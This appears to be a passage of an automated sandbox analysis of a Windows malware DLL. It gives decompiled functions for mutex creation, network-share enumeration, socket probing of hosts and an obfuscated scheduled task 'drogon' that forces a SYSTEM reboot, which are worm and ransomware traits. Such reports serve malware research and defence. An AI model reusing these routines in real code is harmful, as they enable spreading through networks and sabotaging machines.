                                                                                                                                                  0x04777823
                                                                                                                                                  0x0477782c
                                                                                                                                                  0x0477782c
                                                                                                                                                  0x0477783d
                                                                                                                                                  0x04777845
                                                                                                                                                  0x04777848
                                                                                                                                                  0x04777848
                                                                                                                                                  0x0477784e
                                                                                                                                                  0x04777850
                                                                                                                                                  0x04777851
                                                                                                                                                  0x04777857
                                                                                                                                                  0x0477785e
                                                                                                                                                  0x04777867
                                                                                                                                                  0x0477786e
                                                                                                                                                  0x0477786e
                                                                                                                                                  0x04777874
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 0477781B
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 0477783D
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04777848
                                                                                                                                                  • Sleep.KERNEL32(0002BF20,?,?), ref: 04777874
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                                                                                                                                  • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                                                                                                  • API String ID: 3743365020-4042105963
                                                                                                                                                  • Opcode ID: a8dcee63f1a2070fd456c73a844a9d58a8680e35e3e385d9c8f74170997b6855
                                                                                                                                                  • Instruction ID: ae24add8299269cf7af51e5616f6ab1b626f5dfc4297871ae23f2fbf83c6707b
                                                                                                                                                  • Opcode Fuzzy Hash: a8dcee63f1a2070fd456c73a844a9d58a8680e35e3e385d9c8f74170997b6855
                                                                                                                                                  • Instruction Fuzzy Hash: B80196B1540218BAFB3477A59DCCDBB7B7CDF42A58FD00128B901E2215DA64BC0185B1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 0477A4A5
                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 0477A4C3
                                                                                                                                                  • htons.WS2_32(?), ref: 0477A4E3
                                                                                                                                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0477A4F7
                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0477A509
                                                                                                                                                  • select.WS2_32(00000001,00000000,?,00000000,?), ref: 0477A536
                                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0477A549
                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0477A557
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1369790671-0
                                                                                                                                                  • Opcode ID: 1c0696db8818b165cceb50f460e0665cfe6a1034ae9cfd69bddf6504f06bc217
                                                                                                                                                  • Instruction ID: 15dda9a80f535031547191e2824fe853b8ea63a661d200c7abc601f5a59a8d52
                                                                                                                                                  • Opcode Fuzzy Hash: 1c0696db8818b165cceb50f460e0665cfe6a1034ae9cfd69bddf6504f06bc217
                                                                                                                                                  • Instruction Fuzzy Hash: 39316F71900218BFEB20DFA8CC88EEEBBBDEF48310F40456AF515E2150D7789A458B55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E04777F04() {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void _v38;
                                                                                                                                                  				short _v40;
                                                                                                                                                  				void _v74;
                                                                                                                                                  				short _v76;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t33;
                                                                                                                                                  				signed int _t35;
                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  
                                                                                                                                                  				_t35 = 7;
                                                                                                                                                  				_v40 = 0;
                                                                                                                                                  				memset( &_v38, 0, _t35 << 2);
                                                                                                                                                  				asm("stosw");
                                                                                                                                                  				_push(8);
                                                                                                                                                  				_v76 = 0;
                                                                                                                                                  				memset( &_v74, 0, 0 << 2);
                                                                                                                                                  				_t33 = 0;
                                                                                                                                                  				_v8 = 0x10;
                                                                                                                                                  				if(GetComputerNameW( &_v40,  &_v8) == 0) {
                                                                                                                                                  					L8:
                                                                                                                                                  					return _t33;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t46 = 0;
                                                                                                                                                  					_t23 = E04777D8D(0,  &_v40, _v8);
                                                                                                                                                  					_t39 =  *0x4783984; // 0x2ff54d0
                                                                                                                                                  					_t44 = _t23;
                                                                                                                                                  					if(_t39 != 0) {
                                                                                                                                                  						_t30 =  *0x4787b94;
                                                                                                                                                  						if( *0x4787b94 != 0) {
                                                                                                                                                  							_t46 = E04777D8D(_t39, _t39, _t30 >> 1);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					wsprintfW( &_v76, L"%08X%08X", _t44, _t46);
                                                                                                                                                  					_t27 = CreateMutexW(_t33, _t33,  &_v76); // executed
                                                                                                                                                  					if(_t27 == 0) {
                                                                                                                                                  						GetLastError();
                                                                                                                                                  					} else {
                                                                                                                                                  						if(GetLastError() == 0xb7) {
                                                                                                                                                  							_t33 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  			}















                                                                                                                                                  0x04777f10
                                                                                                                                                  0x04777f11
                                                                                                                                                  0x04777f18
                                                                                                                                                  0x04777f1a
                                                                                                                                                  0x04777f1e
                                                                                                                                                  0x04777f21
                                                                                                                                                  0x04777f28
                                                                                                                                                  0x04777f32
                                                                                                                                                  0x04777f34
                                                                                                                                                  0x04777f43
                                                                                                                                                  0x04777fb2
                                                                                                                                                  0x04777fb6
                                                                                                                                                  0x04777f45
                                                                                                                                                  0x04777f4d
                                                                                                                                                  0x04777f4f
                                                                                                                                                  0x04777f54
                                                                                                                                                  0x04777f5a
                                                                                                                                                  0x04777f5e
                                                                                                                                                  0x04777f60
                                                                                                                                                  0x04777f67
                                                                                                                                                  0x04777f72
                                                                                                                                                  0x04777f72
                                                                                                                                                  0x04777f67
                                                                                                                                                  0x04777f7f
                                                                                                                                                  0x04777f8e
                                                                                                                                                  0x04777f97
                                                                                                                                                  0x04777fab
                                                                                                                                                  0x04777f99
                                                                                                                                                  0x04777fa4
                                                                                                                                                  0x04777fa8
                                                                                                                                                  0x04777fa8
                                                                                                                                                  0x04777fa4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777f97

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                                                                                                  • String ID: %08X%08X
                                                                                                                                                  • API String ID: 4289762557-1563805794
                                                                                                                                                  • Opcode ID: e88e04e6cd9e8e785f7048b8a87eeb8ccf5e2d8aff965a1e3fa2bddaba58b42b
                                                                                                                                                  • Instruction ID: aecbeb2e9cd2cf312917a7089124090fbf4feb9f792dfdb44baa80ec5cce2dd7
                                                                                                                                                  • Opcode Fuzzy Hash: e88e04e6cd9e8e785f7048b8a87eeb8ccf5e2d8aff965a1e3fa2bddaba58b42b
                                                                                                                                                  • Instruction Fuzzy Hash: 9F115172600108ABEF14EAF4DA889EEB7BDEF49744F904569E501E2240D774BD068761
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047775D8(intOrPtr _a4, int _a8) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				int _t36;
                                                                                                                                                  				int _t42;
                                                                                                                                                  				short* _t47;
                                                                                                                                                  				signed int _t55;
                                                                                                                                                  				signed int _t56;
                                                                                                                                                  				signed int _t58;
                                                                                                                                                  				intOrPtr* _t61;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				signed int _t66;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  
                                                                                                                                                  				_v12 = _v12 | 0xffffffff;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v8 = 0x4000;
                                                                                                                                                  				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
                                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                                  					_t63 = GlobalAlloc(0x40, _v8);
                                                                                                                                                  					_v24 = _t63;
                                                                                                                                                  					if(_t63 != 0) {
                                                                                                                                                  						_v16 = 1;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							memset(_t63, 0, _v8);
                                                                                                                                                  							_t67 = _t67 + 0xc;
                                                                                                                                                  							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8);
                                                                                                                                                  							if(_t42 != 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_a8 = 0;
                                                                                                                                                  							if(_v12 > 0) {
                                                                                                                                                  								_t16 = _t63 + 0x14; // 0x14
                                                                                                                                                  								_t61 = _t16;
                                                                                                                                                  								do {
                                                                                                                                                  									_t55 = 2;
                                                                                                                                                  									if(( *(_t61 - 8) & _t55) != _t55) {
                                                                                                                                                  										_t47 =  *_t61;
                                                                                                                                                  										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
                                                                                                                                                  											_t56 =  *(_t47 + 4) & 0x0000ffff;
                                                                                                                                                  											if(_t56 != 0) {
                                                                                                                                                  												_t66 = _t56;
                                                                                                                                                  												while(_t66 != 0x5c) {
                                                                                                                                                  													_t55 = _t55 + 1;
                                                                                                                                                  													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
                                                                                                                                                  													_t66 = _t58;
                                                                                                                                                  													if(_t58 != 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													goto L15;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L15:
                                                                                                                                                  											 *(_t47 + _t55 * 2) = 0;
                                                                                                                                                  											E04776B95( *_t61 + 4, 0, _a4);
                                                                                                                                                  											_t63 = _v24;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t18 = _t61 - 0x14; // 0x0
                                                                                                                                                  										E047775D8(_a4, _t18);
                                                                                                                                                  									}
                                                                                                                                                  									_a8 = _a8 + 1;
                                                                                                                                                  									_t61 = _t61 + 0x20;
                                                                                                                                                  								} while (_a8 < _v12);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_t42 != 0x103) {
                                                                                                                                                  							_v16 = 0;
                                                                                                                                                  						}
                                                                                                                                                  						GlobalFree(_t63);
                                                                                                                                                  						WNetCloseEnum(_v20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}



















                                                                                                                                                  0x047775de
                                                                                                                                                  0x047775f3
                                                                                                                                                  0x047775f6
                                                                                                                                                  0x047775fd
                                                                                                                                                  0x04777605
                                                                                                                                                  0x04777617
                                                                                                                                                  0x04777619
                                                                                                                                                  0x0477761e
                                                                                                                                                  0x04777624
                                                                                                                                                  0x04777627
                                                                                                                                                  0x0477762c
                                                                                                                                                  0x04777631
                                                                                                                                                  0x04777640
                                                                                                                                                  0x04777648
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477764e
                                                                                                                                                  0x04777654
                                                                                                                                                  0x04777656
                                                                                                                                                  0x04777656
                                                                                                                                                  0x04777659
                                                                                                                                                  0x0477765e
                                                                                                                                                  0x04777663
                                                                                                                                                  0x04777673
                                                                                                                                                  0x04777677
                                                                                                                                                  0x04777686
                                                                                                                                                  0x0477768d
                                                                                                                                                  0x0477768f
                                                                                                                                                  0x04777691
                                                                                                                                                  0x04777697
                                                                                                                                                  0x04777698
                                                                                                                                                  0x0477769c
                                                                                                                                                  0x047776a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047776a1
                                                                                                                                                  0x04777691
                                                                                                                                                  0x047776a3
                                                                                                                                                  0x047776a8
                                                                                                                                                  0x047776b3
                                                                                                                                                  0x047776b8
                                                                                                                                                  0x047776b8
                                                                                                                                                  0x04777665
                                                                                                                                                  0x04777665
                                                                                                                                                  0x0477766c
                                                                                                                                                  0x0477766c
                                                                                                                                                  0x047776bb
                                                                                                                                                  0x047776c1
                                                                                                                                                  0x047776c4
                                                                                                                                                  0x047776c9
                                                                                                                                                  0x04777654
                                                                                                                                                  0x047776d3
                                                                                                                                                  0x047776d5
                                                                                                                                                  0x047776d5
                                                                                                                                                  0x047776d9
                                                                                                                                                  0x047776e2
                                                                                                                                                  0x047776e2
                                                                                                                                                  0x047776e8
                                                                                                                                                  0x047776ef

                                                                                                                                                  APIs
                                                                                                                                                  • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 047775FD
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04777611
                                                                                                                                                  • memset.MSVCRT ref: 0477762C
                                                                                                                                                  • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04777640
                                                                                                                                                  • GlobalFree.KERNEL32 ref: 047776D9
                                                                                                                                                  • WNetCloseEnum.MPR(0000FFFF), ref: 047776E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4070278229-0
                                                                                                                                                  • Opcode ID: 31128817713e499118ff9a9b5e3f51fd65b05ef3ef18854d714a89a77f684bed
                                                                                                                                                  • Instruction ID: 511f9b0e6c7faad4134018f78546d2b236aaf764dc1a45a62480d64321f5ca76
                                                                                                                                                  • Opcode Fuzzy Hash: 31128817713e499118ff9a9b5e3f51fd65b05ef3ef18854d714a89a77f684bed
                                                                                                                                                  • Instruction Fuzzy Hash: 5E31E072900119EFDF24AF99C8C4DEEBBB9FF45304B918029E604E7214D734BA51CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E04778AB3(void* __ecx, void* _a4) {
                                                                                                                                                  				void _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t10;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				void _t21;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  
                                                                                                                                                  				_t30 = _a4;
                                                                                                                                                  				_t21 =  *_t30;
                                                                                                                                                  				_t10 =  *((intOrPtr*)(_t30 + 4));
                                                                                                                                                  				_v8 = _t21;
                                                                                                                                                  				_v12 = _t10;
                                                                                                                                                  				if(_t21 >= _t10) {
                                                                                                                                                  					L6:
                                                                                                                                                  					LocalFree(_t30);
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t28 = __imp__#14;
                                                                                                                                                  				do {
                                                                                                                                                  					_t14 = E0477A567( *_t28(_t21)); // executed
                                                                                                                                                  					if(_t14 != 0) {
                                                                                                                                                  						__imp__#12( *_t28(_t21));
                                                                                                                                                  						_t24 = E0477641A(_t15);
                                                                                                                                                  						if(_t24 != 0) {
                                                                                                                                                  							E04776B95(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
                                                                                                                                                  							HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                  							_t30 = _a4;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t21 = _v8 + 1;
                                                                                                                                                  					_v8 = _t21;
                                                                                                                                                  				} while (_t21 < _v12);
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}












                                                                                                                                                  0x04778aba
                                                                                                                                                  0x04778abd
                                                                                                                                                  0x04778abf
                                                                                                                                                  0x04778ac3
                                                                                                                                                  0x04778ac6
                                                                                                                                                  0x04778acb
                                                                                                                                                  0x04778b1e
                                                                                                                                                  0x04778b1f
                                                                                                                                                  0x04778b2b
                                                                                                                                                  0x04778b2b
                                                                                                                                                  0x04778acd
                                                                                                                                                  0x04778ad3
                                                                                                                                                  0x04778ad7
                                                                                                                                                  0x04778ade
                                                                                                                                                  0x04778ae4
                                                                                                                                                  0x04778af0
                                                                                                                                                  0x04778af4
                                                                                                                                                  0x04778afb
                                                                                                                                                  0x04778b09
                                                                                                                                                  0x04778b0f
                                                                                                                                                  0x04778b0f
                                                                                                                                                  0x04778af4
                                                                                                                                                  0x04778b15
                                                                                                                                                  0x04778b16
                                                                                                                                                  0x04778b19
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • htonl.WS2_32(74CB6490), ref: 04778AD4
                                                                                                                                                  • htonl.WS2_32(74CB6490), ref: 04778AE1
                                                                                                                                                  • inet_ntoa.WS2_32(00000000), ref: 04778AE4
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74164AB0,?), ref: 04776439
                                                                                                                                                    • Part of subcall function 0477641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04776446
                                                                                                                                                    • Part of subcall function 0477641A: HeapAlloc.KERNEL32(00000000), ref: 0477644D
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04776465
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04778B02
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000), ref: 04778B09
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 04778B1F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3470587009-0
                                                                                                                                                  • Opcode ID: 24b1ff790edf9e637774fddaf8bdeea46dbca4fc75e24e8db4ddd34ca3d8aec5
                                                                                                                                                  • Instruction ID: aef927eb30087b440ac49cbc114c19d15d6a17f424fbcaf3cba27f0b17b9b116
                                                                                                                                                  • Opcode Fuzzy Hash: 24b1ff790edf9e637774fddaf8bdeea46dbca4fc75e24e8db4ddd34ca3d8aec5
                                                                                                                                                  • Instruction Fuzzy Hash: E10112B1A00714ABDB10AFA5DD8CC9FB7ACEF483547958855E501E7201D674FD018A64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04778192() {
                                                                                                                                                  				short _v6;
                                                                                                                                                  				short _v8;
                                                                                                                                                  				short _v10;
                                                                                                                                                  				short _v12;
                                                                                                                                                  				short _v14;
                                                                                                                                                  				short _v16;
                                                                                                                                                  				short _v18;
                                                                                                                                                  				short _v20;
                                                                                                                                                  				short _v22;
                                                                                                                                                  				short _v24;
                                                                                                                                                  				short _v26;
                                                                                                                                                  				short _v28;
                                                                                                                                                  				short _v30;
                                                                                                                                                  				short _v32;
                                                                                                                                                  				short _v34;
                                                                                                                                                  				short _v36;
                                                                                                                                                  				short _v38;
                                                                                                                                                  				short _v40;
                                                                                                                                                  				short _v42;
                                                                                                                                                  				short _v44;
                                                                                                                                                  				short _v46;
                                                                                                                                                  				short _v48;
                                                                                                                                                  				short _v50;
                                                                                                                                                  				short _v52;
                                                                                                                                                  				struct _SYSTEMTIME _v68;
                                                                                                                                                  				short _v1628;
                                                                                                                                                  				short _v3676;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				short _t56;
                                                                                                                                                  				short _t57;
                                                                                                                                                  				short _t58;
                                                                                                                                                  				short _t59;
                                                                                                                                                  				short _t60;
                                                                                                                                                  				short _t61;
                                                                                                                                                  				short _t62;
                                                                                                                                                  				short _t63;
                                                                                                                                                  				short _t64;
                                                                                                                                                  				short _t65;
                                                                                                                                                  				short _t66;
                                                                                                                                                  				short _t67;
                                                                                                                                                  				short _t68;
                                                                                                                                                  				short _t69;
                                                                                                                                                  				short _t70;
                                                                                                                                                  				short _t79;
                                                                                                                                                  				short _t80;
                                                                                                                                                  				signed int _t82;
                                                                                                                                                  				signed int _t84;
                                                                                                                                                  				short _t86;
                                                                                                                                                  				short _t87;
                                                                                                                                                  				short _t89;
                                                                                                                                                  				short _t90;
                                                                                                                                                  				short _t92;
                                                                                                                                                  				signed int _t98;
                                                                                                                                                  				signed int _t101;
                                                                                                                                                  
                                                                                                                                                  				_t80 = 0;
                                                                                                                                                  				if(( *0x4787bc0 & 0x00000002) != 0) {
                                                                                                                                                  					GetLocalTime( &_v68);
                                                                                                                                                  					_t48 = E04776477();
                                                                                                                                                  					if(_t48 < 0xf) {
                                                                                                                                                  						_t48 = 0xf;
                                                                                                                                                  					}
                                                                                                                                                  					_t49 = (_v68.wMinute & 0x0000ffff) + _t48 + 3;
                                                                                                                                                  					_t82 = 0x3c;
                                                                                                                                                  					_t101 = _t49 % _t82;
                                                                                                                                                  					_t84 = 0x18;
                                                                                                                                                  					_t98 = ((_v68.wHour & 0x0000ffff) + _t49 / _t82) % _t84;
                                                                                                                                                  					if(GetSystemDirectoryW( &_v1628, 0x30c) != 0) {
                                                                                                                                                  						_t56 = 0x73;
                                                                                                                                                  						_v52 = _t56;
                                                                                                                                                  						_t57 = 0x68;
                                                                                                                                                  						_v50 = _t57;
                                                                                                                                                  						_t58 = 0x75;
                                                                                                                                                  						_v48 = _t58;
                                                                                                                                                  						_t59 = 0x74;
                                                                                                                                                  						_v46 = _t59;
                                                                                                                                                  						_t60 = 0x64;
                                                                                                                                                  						_v44 = _t60;
                                                                                                                                                  						_t61 = 0x6f;
                                                                                                                                                  						_v42 = _t61;
                                                                                                                                                  						_t62 = 0x77;
                                                                                                                                                  						_v40 = _t62;
                                                                                                                                                  						_t63 = 0x6e;
                                                                                                                                                  						_v38 = _t63;
                                                                                                                                                  						_t64 = 0x2e;
                                                                                                                                                  						_v36 = _t64;
                                                                                                                                                  						_t65 = 0x65;
                                                                                                                                                  						_v34 = _t65;
                                                                                                                                                  						_t66 = 0x78;
                                                                                                                                                  						_v32 = _t66;
                                                                                                                                                  						_t67 = 0x65;
                                                                                                                                                  						_v30 = _t67;
                                                                                                                                                  						_t68 = 0x20;
                                                                                                                                                  						_v28 = _t68;
                                                                                                                                                  						_t86 = 0x2f;
                                                                                                                                                  						_v26 = _t86;
                                                                                                                                                  						_t87 = 0x72;
                                                                                                                                                  						_v24 = _t87;
                                                                                                                                                  						_v22 = _t68;
                                                                                                                                                  						_t89 = 0x2f;
                                                                                                                                                  						_v20 = _t89;
                                                                                                                                                  						_t90 = 0x74;
                                                                                                                                                  						_v18 = _t90;
                                                                                                                                                  						_v16 = _t68;
                                                                                                                                                  						_t92 = 0x30;
                                                                                                                                                  						_v12 = _t68;
                                                                                                                                                  						_t69 = 0x2f;
                                                                                                                                                  						_v10 = _t69;
                                                                                                                                                  						_t70 = 0x66;
                                                                                                                                                  						_v8 = _t70;
                                                                                                                                                  						_v6 = 0;
                                                                                                                                                  						_v14 = _t92;
                                                                                                                                                  						if(PathAppendW( &_v1628,  &_v52) != 0) {
                                                                                                                                                  							wsprintfW( &_v3676, L"schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00",  &_v1628, _t98, _t101);
                                                                                                                                                  							_t79 = E04777FB7( &_v3676, 0); // executed
                                                                                                                                                  							_t80 = _t79;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t80;
                                                                                                                                                  			}


























































                                                                                                                                                  0x0477819c
                                                                                                                                                  0x047781a5
                                                                                                                                                  0x047781af
                                                                                                                                                  0x047781b5
                                                                                                                                                  0x047781bd
                                                                                                                                                  0x047781c1
                                                                                                                                                  0x047781c1
                                                                                                                                                  0x047781c8
                                                                                                                                                  0x047781ce
                                                                                                                                                  0x047781dd
                                                                                                                                                  0x047781df
                                                                                                                                                  0x047781f0
                                                                                                                                                  0x047781fa
                                                                                                                                                  0x04778202
                                                                                                                                                  0x04778205
                                                                                                                                                  0x04778209
                                                                                                                                                  0x0477820c
                                                                                                                                                  0x04778210
                                                                                                                                                  0x04778213
                                                                                                                                                  0x04778217
                                                                                                                                                  0x0477821a
                                                                                                                                                  0x0477821e
                                                                                                                                                  0x04778221
                                                                                                                                                  0x04778225
                                                                                                                                                  0x04778228
                                                                                                                                                  0x0477822c
                                                                                                                                                  0x0477822f
                                                                                                                                                  0x04778233
                                                                                                                                                  0x04778236
                                                                                                                                                  0x0477823a
                                                                                                                                                  0x0477823d
                                                                                                                                                  0x04778241
                                                                                                                                                  0x04778244
                                                                                                                                                  0x04778248
                                                                                                                                                  0x0477824b
                                                                                                                                                  0x0477824f
                                                                                                                                                  0x04778252
                                                                                                                                                  0x04778256
                                                                                                                                                  0x0477825b
                                                                                                                                                  0x0477825f
                                                                                                                                                  0x04778262
                                                                                                                                                  0x04778266
                                                                                                                                                  0x04778269
                                                                                                                                                  0x0477826f
                                                                                                                                                  0x04778273
                                                                                                                                                  0x04778276
                                                                                                                                                  0x0477827a
                                                                                                                                                  0x0477827d
                                                                                                                                                  0x04778283
                                                                                                                                                  0x04778287
                                                                                                                                                  0x0477828a
                                                                                                                                                  0x0477828e
                                                                                                                                                  0x0477828f
